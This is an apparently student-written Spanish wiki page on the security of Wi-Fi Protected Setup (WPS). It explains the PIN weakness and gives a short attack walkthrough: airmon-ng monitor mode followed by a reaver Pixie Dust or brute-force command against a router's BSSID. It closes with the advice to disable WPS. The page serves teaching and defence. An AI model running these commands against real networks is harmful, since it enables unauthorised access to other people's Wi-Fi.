Trabajo:Seguridad WPS

De FdIwiki ELP
Saltar a: navegación, buscar

Cifrado WPS

WPS (Wi-Fi Protected Setup) es un estándar de 2007, promovido por la Wi-Fi Alliance para facilitar la creación de redes WLAN. En otras palabras, WPS no es un mecanismo de seguridad de por sí, se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas otros.1 Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación.

Problemas de seguridad

El cifrado en sí es un error, 8 simples números de pin de los cuales si adivinas los primeros 4 o los últimos 4 te salta una flag de confirmación, por lo cual en menos de 8 horas de fuerza bruta tienes la contraseña WPA2.

Cómo ataca un ladrón

1.) Miramos la interfaz que tiene nuestra tarjeta de red para ponerla en modo monitor

  1. ifconfig

2.) Ponemos la tarjeta de red en modo monitor para poder capturar todos los paquetes wifi que circulan por el aire

  1. airmon-ng start wlan0

3.) Vamos a usar la herramienta reaver la cual se aprovecha del fallo de seguridad en WPS, este proceso dura unos segundos.

  1. reaver -i wlan0mon -b <BSSID> -vv -K 1

Si esto no funciona quitamos la flag -K 1 y hará ataques de fuerza bruta.

Cómo mantenerte seguro ante estos ataques

Desactivando el WPS.

Enlaces externos

https://es.wikipedia.org/wiki/Wi-Fi_Protected_Setup